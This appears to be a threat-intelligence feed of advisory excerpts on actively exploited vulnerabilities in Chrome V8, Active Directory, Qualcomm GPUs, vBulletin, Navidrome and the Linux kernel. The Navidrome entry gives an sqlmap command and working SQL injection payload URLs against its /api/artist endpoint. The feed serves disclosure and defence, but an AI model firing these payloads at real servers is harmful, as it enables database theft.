🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Google has released a security update for Chrome desktop, addressing three vulnerabilities, including a critical zero-day flaw in the V8 JavaScript engine that attackers are actively exploiting. The patch, now rolling out to Windows, Mac, and Linux users via version 137.0.7151.68/.69, aims to protect millions of Chrome users from potential heap corruption attacks. The zero-day, …
The post Google Patches Actively Exploited Zero-Day in Chrome’s V8 Engine appeared first on CyberInsider.
June 3rd, 2025 (2 days ago)
|
🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Google on Monday released out-of-band fixes to address three security issues in its Chrome browser, including one that it said has come under active exploitation in the wild.
The high-severity flaw is being tracked as CVE-2025-5419, and has been flagged as an out-of-bounds read and write vulnerability in the V8 JavaScript and WebAssembly engine.
"Out of bounds read and write in V8 in Google
EPSS Score: 0.12%
June 3rd, 2025 (2 days ago)
|
CVE-2025-5419 |
🚨 Marked as known exploited on June 3rd, 2025 (2 days ago).
Description: Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)
EPSS Score: 0.12%
June 3rd, 2025 (2 days ago)
|
🚨 Marked as known exploited on June 2nd, 2025 (3 days ago).
Description: Frequently asked questions about “BadSuccessor,” a zero-day privilege escalation vulnerability in Active Directory domains with at least one Windows Server 2025 domain controller.
Background
Tenable’s Research Special Operations (RSO) and the Identity Content team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding a newly disclosed zero-day in Active Directory called BadSuccessor.
FAQ
What is BadSuccessor?
BadSuccessor is the name of a zero-day privilege escalation vulnerability in Active Directory that was discovered and disclosed by Yuval Gordon, a security researcher at Akamai.
According to Gordon, the flaw exists in delegated Managed Service Accounts (dMSAs), a service account type in Active Directory (AD) that was introduced in Windows Server 2025 to enable the migration of non-managed service accounts.
What are the vulnerabilities associated with BadSuccessor?
As of June 2, Microsoft had not assigned a CVE identifier for BadSuccessor. Microsoft is the CVE Numbering Authority (CNA) for its products. Since there are currently no patches available for BadSuccessor, no CVE has been assigned. If Microsoft does assign a CVE alongside patches for it, we will update this blog accordingly.
How is BadSuccessor exploited?
To exploit BadSuccessor, an attacker needs to be able to access a user account with specific permissions in AD, and at least one domain controller in the domain needs to be running Windows Server 2025.
Based on Akamai’s research, even if an AD do...
June 2nd, 2025 (3 days ago)
|
🚨 Marked as known exploited on June 2nd, 2025 (3 days ago).
Description: Qualcomm has released security patches for three zero-day vulnerabilities in the Adreno Graphics Processing Unit (GPU) driver that impact dozens of chipsets and are actively exploited in targeted attacks. [...]
June 2nd, 2025 (3 days ago)
|
🚨 Marked as known exploited on May 31st, 2025 (5 days ago).
Description: Summary of Releases v10.2.1 & v10.2.2
This month, we've released two new versions of Nuclei Templates, which introduce numerous improvements and new templates for Nuclei users.
Here are some highlighted stats from the combined releases:
🎉 106 new templates added
🔥 57 new CVEs covered
🛡️ 10 actively exploited KEVs included
🚀 11 first-time contributions
💰 Template Reward program launched
Introduction
The Nuclei Templates v10.2.1 and v10.2.2 were released earlier this month, introducing
May 31st, 2025 (5 days ago)
|
🚨 Marked as known exploited on May 30th, 2025 (6 days ago).
Description: Two critical vulnerabilities affecting the open-source forum software vBulletin have been discovered, with one confirmed to be actively exploited in the wild. [...]
May 30th, 2025 (6 days ago)
|
🚨 Marked as known exploited on May 29th, 2025 (7 days ago).
Description: 🛡 Security Advisory: SQL Injection Vulnerability in Navidrome v0.55.2
Overview
This vulnerability arises due to improper input validation on the role parameter within the API endpoint /api/artist. Attackers can exploit this flaw to inject arbitrary SQL queries, potentially gaining unauthorized access to the backend database and compromising sensitive user information.
Details
Vulnerable Component:
API endpoint → /api/artist
Parameter → role
Vulnerability Type:
SQL Injection (stacked queries, UNION queries)
Database Affected:
SQLite (confirmed exploitation via SQLite-specific payloads)
Impact:
Successful exploitation allows an unauthenticated attacker to:
Execute arbitrary SQL commands
Extract or manipulate sensitive data (e.g., user records, playlists)
Potentially escalate privileges or disrupt service availability
Proof of Concept (PoC)
Example Exploit Command:
sqlmap.py -r navi --level 5 --risk 3 -a --banner --batch --tamper charencode --dbms sqlite
Sample Payloads:
Stacked Queries:
http://navidrome/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist');SELECT LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2))))--
UNION-Based Query:
http://navidrome.local/api/artist?_end=15&_order=ASC&_sort=name&_start=0&role=albumartist') UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,CHAR(113,98,118,98,113)||CHAR(113,84,86,119,114,71,106,104,90,118,120,104,79,66,104,108,121,106,70,68,90,113,104,117,67,98,113,67,103,84,71,...
May 29th, 2025 (7 days ago)
|
🚨 Marked as known exploited on May 23rd, 2025 (13 days ago).
Description: Check out expert recommendations for protecting your AI system data. Plus, boost your IT department’s cybersecurity skills with a new interactive framework. In addition, learn about a malware campaign targeting critical infrastructure orgs. And get the latest on Russian cyber espionage and on a NIST effort to enhance vulnerability prioritization.
Dive into five things that are top of mind for the week ending May 23.
1 - Cyber agencies offer AI data security best practices
With organizations gleefully deploying artificial intelligence (AI) tools to enhance their operations, cybersecurity teams face the critical task of securing AI data.
If your organization is looking for guidance on how to protect the data used in AI systems, check out new best practices released this week by cyber agencies from Australia, New Zealand, the U.K. and the U.S.
“This guidance is intended primarily for organizations using AI systems in their operations, with a focus on protecting sensitive, proprietary or mission-critical data,” reads the document titled “AI Data Security: Best Practices for Securing Data Used to Train & Operate AI Systems.”
“The principles outlined in this information sheet provide a robust foundation for securing AI data and ensuring the reliability and accuracy of AI-driven outcomes,” it adds. By drafting this guidance, the authoring agencies seek to accomplish three goals:
Create awareness about data security risks involved in developing, testing and deploying AI systems.
Offer bes...
May 23rd, 2025 (13 days ago)
|
CVE-2025-37922 |
🚨 Marked as known exploited on May 20th, 2025 (16 days ago).
Description: In the Linux kernel, the following vulnerability has been resolved:
book3s64/radix : Align section vmemmap start address to PAGE_SIZE
A vmemmap altmap is a device-provided region used to provide
backing storage for struct pages. For each namespace, the altmap
should belong to that same namespace. If the namespaces are
created unaligned, there is a chance that the section vmemmap
start address could also be unaligned. If the section vmemmap
start address is unaligned, the altmap page allocated from the
current namespace might be used by the previous namespace also.
During the free operation, since the altmap is shared between two
namespaces, the previous namespace may detect that the page does
not belong to its altmap and incorrectly assume that the page is a
normal page. It then attempts to free the normal page, which leads
to a kernel crash.
Kernel attempted to read user page (18) - exploit attempt? (uid: 0)
BUG: Kernel NULL pointer dereference on read at 0x00000018
Faulting instruction address: 0xc000000000530c7c
Oops: Kernel access of bad area, sig: 11 [#1]
LE PAGE_SIZE=64K MMU=Radix SMP NR_CPUS=2048 NUMA pSeries
CPU: 32 PID: 2104 Comm: ndctl Kdump: loaded Tainted: G W
NIP: c000000000530c7c LR: c000000000530e00 CTR: 0000000000007ffe
REGS: c000000015e57040 TRAP: 0300 Tainted: G W
MSR: 800000000280b033 CR: 84482404
CFAR: c000000000530dfc DAR: 0000000000000018 DSISR: 40000000 IRQMASK: 0
GPR00: c000000000530e00 c000000015e572e0 c000000002c5cb00 c00c00...
EPSS Score: 0.02%
May 20th, 2025 (16 days ago)
|